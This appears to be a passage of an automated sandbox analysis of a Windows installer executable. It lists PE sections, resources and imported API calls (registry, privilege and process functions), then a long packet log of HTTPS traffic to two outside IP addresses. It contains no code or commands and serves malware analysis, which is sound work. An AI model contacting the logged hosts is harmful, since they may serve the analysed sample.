| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x179000 | 0x1a3c8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x66d7 | 0x6800 | 179c19d526cb45e37f19e2e748c03470 | False | 0.6618088942307693 | data | 6.443211282113973 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x1358 | 0x1400 | bd82d08a08da8783923a22b467699302 | False | 0.4431640625 | data | 5.103358601944578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x62378 | 0x600 | 11e66ee9873a378c86020f9b7ffc48f2 | False | 0.509765625 | data | 4.120231668410469 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x6d000 | 0x10c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x179000 | 0x1a3c8 | 0x1a400 | f5b854e8e43a68f60abf87a5e757a321 | False | 0.690141369047619 | data | 6.5935216467364866 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_ICON | 0x1794a8 | 0xcd42 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9968789251322651 |
| RT_ICON | 0x1861f0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3778932451582428 |
| RT_ICON | 0x18a418 | 0x3228 | Device independent bitmap graphic, 64 x 128 x 24, image size 12800 | English | United States | 0.3514797507788162 |
| RT_ICON | 0x18d640 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4713692946058091 |
| RT_ICON | 0x18fbe8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5079737335834896 |
| RT_ICON | 0x190c90 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3200 | English | United States | 0.4762345679012346 |
| RT_ICON | 0x191938 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6693262411347518 |
| RT_ICON | 0x191da0 | 0x2e8 | data | English | United States | 0.020161290322580645 |
| RT_ICON | 0x192088 | 0x128 | data | English | United States | 0.04391891891891892 |
| RT_DIALOG | 0x1921b0 | 0x114 | data | English | United States | 0.5072463768115942 |
| RT_DIALOG | 0x1922c8 | 0x1f4 | data | English | United States | 0.388 |
| RT_DIALOG | 0x1924c0 | 0xec | data | English | United States | 0.6228813559322034 |
| RT_DIALOG | 0x1925b0 | 0x94 | data | English | United States | 0.5945945945945946 |
| RT_DIALOG | 0x192648 | 0xe2 | data | English | United States | 0.6371681415929203 |
| RT_DIALOG | 0x192730 | 0x114 | data | English | United States | 0.5362318840579711 |
| RT_DIALOG | 0x192848 | 0x1f4 | data | English | United States | 0.398 |
| RT_DIALOG | 0x192a40 | 0xec | data | English | United States | 0.6567796610169492 |
| RT_DIALOG | 0x192b30 | 0x94 | data | English | United States | 0.668918918918919 |
| RT_DIALOG | 0x192bc8 | 0xe2 | data | English | United States | 0.668141592920354 |
| RT_GROUP_ICON | 0x192cb0 | 0x84 | data | English | United States | 0.6212121212121212 |
| RT_VERSION | 0x192d38 | 0x260 | data | English | United States | 0.4819078947368421 |
| RT_MANIFEST | 0x192f98 | 0x42e | XML 1.0 document, ASCII text, with very long lines (1070), with no line terminators | English | United States | 0.5130841121495328 |
| DLL | Import |
| --- | --- |
| ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW |
| SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW |
| ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree |
| COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create |
| USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics |
| GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor |
| KERNEL32.dll | RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW |
| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | United States | |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
                                                                                                                                                                          Dec 9, 2024 17:53:14.725856066 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.725893974 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.725940943 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.725960016 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.726003885 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.726128101 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.741506100 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.741518021 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.741569042 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.741581917 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.741599083 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.741616964 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.756529093 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.756540060 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.756587029 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.756598949 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.756623983 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.756653070 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.771627903 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.771661043 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.771694899 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.771707058 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.771738052 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.771749020 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.782049894 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.782110929 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.782135010 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.782150984 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.782201052 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.782231092 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.793998957 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.794032097 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.794081926 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.794094086 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.794127941 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.794133902 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.906872988 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.906903982 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.906939983 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.906958103 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.906980991 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.906997919 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.916449070 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.916484118 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.916515112 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.916527033 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.916572094 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.916582108 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.924943924 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.924972057 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.925009012 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.925020933 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.925054073 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.925066948 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.932539940 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.932559967 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.932594061 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.932619095 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.932629108 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.932660103 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.941236019 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.941251993 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.941306114 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.941318989 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.941375971 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.949651957 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.949670076 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.949703932 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.949716091 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.949748039 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.957670927 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.957688093 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.957756042 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.957767963 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.957807064 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.965497971 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.965514898 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.965559959 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.965574980 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:14.965579033 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:14.965640068 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.099078894 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.099107981 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.099215984 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.099239111 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.099342108 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.104824066 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.104840994 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.104898930 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.104918003 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.104954004 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.104954004 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.110111952 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.110132933 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.110200882 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.110218048 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.110234022 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.110274076 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.116197109 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.116215944 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.116298914 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.116316080 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.116385937 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.119714022 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.119760036 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.119803905 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.119821072 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:15.119852066 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.119863033 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.120292902 CET49737443192.168.2.4194.87.189.43
                                                                                                                                                                          Dec 9, 2024 17:53:15.120311975 CET44349737194.87.189.43192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:00.659255028 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:00.659291029 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:00.659363031 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:00.676378965 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:00.676409006 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:01.979626894 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:01.979701996 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.462224007 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.462254047 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.462305069 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.462321043 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.462361097 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.462372065 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.603383064 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.603413105 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.603480101 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.603513002 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.603535891 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.603559017 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.610104084 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.610132933 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.610177994 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.610187054 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.610234976 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.616978884 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.617006063 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.617089987 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.617096901 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.617134094 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.622888088 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.622922897 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.623007059 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.623028994 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.623179913 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.630131960 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.630156994 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.630198002 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.630220890 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.630240917 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.630260944 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.636140108 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.636168003 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.636220932 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.636241913 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.636260033 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.636276960 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.643008947 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.643038988 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.643095970 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.643111944 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.643136978 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.643157005 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.654416084 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.654443979 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.654486895 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.654509068 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.654562950 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.654695988 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.811098099 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.811125994 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.811156034 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.811172962 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.811182022 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.811244011 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.818069935 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.818095922 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.818151951 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.818172932 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.818214893 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.823965073 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.823992968 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.824043989 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.824057102 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.824083090 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.824099064 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.831130981 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.831161976 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.831211090 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.831228018 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.831248999 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.831269979 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.838318110 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.838346958 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.838376999 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.838387012 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.838417053 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.843940020 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.843965054 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.844002962 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.844017982 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.844039917 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.844063044 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.850831032 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.850861073 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.850923061 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.850941896 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.850984097 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.856822968 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.856852055 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.856931925 CET49824443192.168.2.4107.167.96.30
